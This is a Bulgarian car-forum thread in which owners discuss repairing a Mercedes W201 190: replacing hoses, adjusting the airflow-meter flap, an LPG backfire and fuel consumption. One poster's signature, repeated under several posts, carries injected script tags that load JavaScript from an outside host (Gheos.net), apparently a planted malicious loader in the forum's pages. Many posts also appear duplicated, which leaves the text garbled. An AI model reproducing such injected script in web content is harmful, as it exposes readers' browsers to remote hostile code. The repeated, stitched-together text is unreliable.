Основен ремонт и още нещо!W201
Започната от bon_bonev, 25 яну 2009 - 00:34:17
55 мнения по тази тема
#46
Публикувано 05 май 2009 - 23:32
за сметка на това пък си купих комплект маркучи . старите май си бяха оригиналните и при сваляне на петата дюза скъсах единия. явно му беше дошло времето защото се беше изпекъл доста и му липсваше пластичност, останалите си бяха доста нацепени. за по малко от 40 лв си зех това
DSC00099.JPG 552,72K
92 Брой сваляния
ето и сравнения със старите
DSC00100.JPG 389,08K 71 Брой сваляния
DSC00101.JPG 426,83K 50 Брой сваляния
DSC00102.JPG 368,67K 50 Брой сваляния
не забравих и една нова муфичка. старата си я оставих резерва, че не се знае кога може да гръмне газовата.
DSC00107.JPG 276,47K 62 Брой сваляния
ето и сравнения със старите
DSC00100.JPG 389,08K 71 Брой сваляния
DSC00101.JPG 426,83K 50 Брой сваляния
DSC00102.JPG 368,67K 50 Брой сваляния
не забравих и една нова муфичка. старата си я оставих резерва, че не се знае кога може да гръмне газовата.
DSC00107.JPG 276,47K 62 Брой сваляния
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#47
Публикувано 06 май 2009 - 12:54
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#48
Публикувано 29 май 2009 - 11:07
NEZNAM DALI O6TE NQKOI SLEDI TAZI TEMA?NO AZ SMENQM DVIGATEL NA 190-KA OT 2.3 SEGA MY SLAGAM 2.0 VSI4KO SAM SVARZAL I SEGA NE MOGA DA NAMERQ DAT4IKA ZA MASLOTO I MQSTOTO NA O6TE NQKOLKO JI4KI... NQKOI AKO MOJE DA ME NASO4I KAM SAIT S PODROBNA EL SHEMA ILI PONE SAMO NA DAT4ICITE ...MRERSI PREDVARITELNO
#49
Публикувано 29 май 2009 - 13:20
Мисля, че тук ще намериш това което търсиш: схема на важна част от правилатаNEZNAM DALI O6TE NQKOI SLEDI TAZI TEMA?NO AZ SMENQM DVIGATEL NA 190-KA OT 2.3 SEGA MY SLAGAM 2.0 VSI4KO SAM SVARZAL I SEGA NE MOGA DA NAMERQ DAT4IKA ZA MASLOTO I MQSTOTO NA O6TE NQKOLKO JI4KI... NQKOI AKO MOJE DA ME NASO4I KAM SAIT S PODROBNA EL SHEMA ILI PONE SAMO NA DAT4ICITE ...MRERSI PREDVARITELNO
Mercedes-Benz - Unlike any other!
#50
Публикувано 12 юни 2009 - 06:06
Тази тема май стана нещо като блог на колата ми.
Скоро ,поради много акъл от моя страна ,както си карах на бензин и то на високиобороти реших да обърна на газ. Последва звучно дум.Слезах наместих маркуча от долу запалих и тръгнах. Да ама не. Колата не вървеше точно по същия начин.Реших ,че като ми остане време ще я поразглобя да прегледам клапата на дебитомера , съединения ,легена и други.В неделя обаче напълно и се изгубиха оборотите на празен ход. Трудно палеше на газ ,а на бензин бе невъзможно.При тръгване зора беше голам- подавам газ , пък тя си гасне.По светофарите що пот изтече от мен не е истина.
Диагнозата:
Клапата на дебитомера не стоеше на мястото си .
PIC_5502.JPG 1,55MB 68 Брой сваляния PIC_5504.JPG 1,53MB 66 Брой сваляния
Легена на дебитомера бе прилично разпран
DSC00147.JPG 198,36K 74 Брой сваляния DSC00148.JPG 184,91K 58 Брой сваляния
Скоро ,поради много акъл от моя страна ,както си карах на бензин и то на високиобороти реших да обърна на газ. Последва звучно дум.Слезах наместих маркуча от долу запалих и тръгнах. Да ама не. Колата не вървеше точно по същия начин.Реших ,че като ми остане време ще я поразглобя да прегледам клапата на дебитомера , съединения ,легена и други.В неделя обаче напълно и се изгубиха оборотите на празен ход. Трудно палеше на газ ,а на бензин бе невъзможно.При тръгване зора беше голам- подавам газ , пък тя си гасне.По светофарите що пот изтече от мен не е истина.
Диагнозата:
Клапата на дебитомера не стоеше на мястото си .
PIC_5502.JPG 1,55MB 68 Брой сваляния PIC_5504.JPG 1,53MB 66 Брой сваляния
Легена на дебитомера бе прилично разпран
DSC00147.JPG 198,36K 74 Брой сваляния DSC00148.JPG 184,91K 58 Брой сваляния
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#51
Публикувано 12 юни 2009 - 10:37
Стига бе, човек ! Таман събера смелост да сложа газова уредба на 190-то и някой изреве.
Много кофти , ама 102 мотор с обикновенна газова уредба върви най-добре с карбуратор.Махай ке-джетроника,слагай карбуратор и ще забравиш за гърмежите (ще забравиш и каква хубава кола си имал преди време,ама поне ще се возиш евтино). Дано с малко парички да ти се размине ремонта !
Много кофти , ама 102 мотор с обикновенна газова уредба върви най-добре с карбуратор.Махай ке-джетроника,слагай карбуратор и ще забравиш за гърмежите (ще забравиш и каква хубава кола си имал преди време,ама поне ще се возиш евтино). Дано с малко парички да ти се размине ремонта !
Mercedes Benz W201 - The Last Action Hero
#52
Публикувано 12 юни 2009 - 17:28
След като дебитомера бе свален настроихме клапата. Направи ми впечатление че самата клапа е или съвсем леко елипсовидна или се завива на ексцентрик. Незнам кое от двете е щото не ми се мереше изобщо , но ако някой прави подобен ремонт да го има на предвид .
Новия маншон на "дебила"
DSC00156.JPG 208,25K 54 Брой сваляния DSC00153.JPG 205,7K 63 Брой сваляния
Самия дебитомер/поглед "от вътре"/
DSC00145.JPG 331,35K 85 Брой сваляния DSC00146.JPG 294,21K 74 Брой сваляния
Последва почистване на дросела и сглобяване. След това запалване на бензин. Да ама неще да пали. След ужасно много въртене на стартер все пак запали , но не работеше равномерно . Оборотите играеха като луди, както преди ремонта.
Успяхме да хванем от къде е проблема
DSC00158.JPG 146,54K 69 Брой сваляния
От тва маркуче което е част от системата- дебитомер,моторче за ПХ, маслеми пари и какво ли още не, се беше сцепило и крадеше въздух.Мистерията за мен е дали се е сцепило само щото е менте или е кофти бройка / сменено е преди месец и изкара около 700 км./ или при детонацията е заминало и то , което е странно. Купено и сменено.Замърка като коте на бензин, на газ имаше много какво да се желае.
Днес следобед минах на газанализатор- перфектни 900 оборота и много добри показатели на СО и СО2. След това при газаджията.
Сега мога да се похваля с ниско прелитащ самолет от модела МВ 190
Новия маншон на "дебила"
DSC00156.JPG 208,25K 54 Брой сваляния DSC00153.JPG 205,7K 63 Брой сваляния
Самия дебитомер/поглед "от вътре"/
DSC00145.JPG 331,35K 85 Брой сваляния DSC00146.JPG 294,21K 74 Брой сваляния
Последва почистване на дросела и сглобяване. След това запалване на бензин. Да ама неще да пали. След ужасно много въртене на стартер все пак запали , но не работеше равномерно . Оборотите играеха като луди, както преди ремонта.
Успяхме да хванем от къде е проблема
DSC00158.JPG 146,54K 69 Брой сваляния
От тва маркуче което е част от системата- дебитомер,моторче за ПХ, маслеми пари и какво ли още не, се беше сцепило и крадеше въздух.Мистерията за мен е дали се е сцепило само щото е менте или е кофти бройка / сменено е преди месец и изкара около 700 км./ или при детонацията е заминало и то , което е странно. Купено и сменено.Замърка като коте на бензин, на газ имаше много какво да се желае.
Днес следобед минах на газанализатор- перфектни 900 оборота и много добри показатели на СО и СО2. След това при газаджията.
Сега мога да се похваля с ниско прелитащ самолет от модела МВ 190
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#53
Публикувано 28 юни 2009 - 19:26
Отчет след последния ремонт :
Стара Загора - с. Драгомирово / общ.Свищов/ и обратно през Шипка/Бузлуджа- в едната посока натоварен и то здраво , а на обратно "юнашко" каране -410 км +70 км. градско = 45 л. пропан -бутан.
Стара Загора - с. Драгомирово / общ.Свищов/ и обратно през Шипка/Бузлуджа- в едната посока натоварен и то здраво , а на обратно "юнашко" каране -410 км +70 км. градско = 45 л. пропан -бутан.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#54
Публикувано 13 януари 2011 - 03:08
Тая клапа на дебитомера как я настроихте, че бера големи ядове с нея.. Както каза май е леко елипсовидна.. Пробвал съм се няколко пъти да я наглася, но или пристъргва от едната страна и седи леко отворена от другата, или ако не стърже никъде се издига прекалено нагоре та чак засмуква от едната страна.. То си има цяр за тая краста с целия механичен инжекцион-една рейка и една мега ама ще видим кога ще стане..
Follow your own star...
#55
Публикувано 13 януари 2011 - 12:18
Нагласи я така че да не стърже никъде и да се издига максимално нагоре.
После има едно пинче в самия корпуса на дебитомера, което определя височината на клапата.
Чуква се леко по него да слезе клапата до втората чертичка на фунията. Слагал съм и схеми от ВИС-а, но сега не мога да ги намеря.
Обаче гледай да не прекалиш, че после за да вдигнеш клапата нагоре, трябва да го избиеш от долната страна, тоест махаш гуменото дъно и тогава.
После има едно пинче в самия корпуса на дебитомера, което определя височината на клапата.
Чуква се леко по него да слезе клапата до втората чертичка на фунията. Слагал съм и схеми от ВИС-а, но сега не мога да ги намеря.
Обаче гледай да не прекалиш, че после за да вдигнеш клапата нагоре, трябва да го избиеш от долната страна, тоест махаш гуменото дъно и тогава.
Прикачени файлове
#56
Публикувано 14 януари 2011 - 10:29
Забравих да кажа, че в положение на покой и с инжекциона под налягане (няколко пъти на контакт), трябва да има около 1-2мм луфт докато клапата почне да натиска плунжера.
Ако няма никакъв луфт, е възможно плунжера да не е легнал въху уплътнението и да натича гориво в колектора.
Ако няма никакъв луфт, е възможно плунжера да не е легнал въху уплътнението и да натича гориво в колектора.
0 потребител(и) четат тази тема
0 потребители, 0 гости, 0 анонимни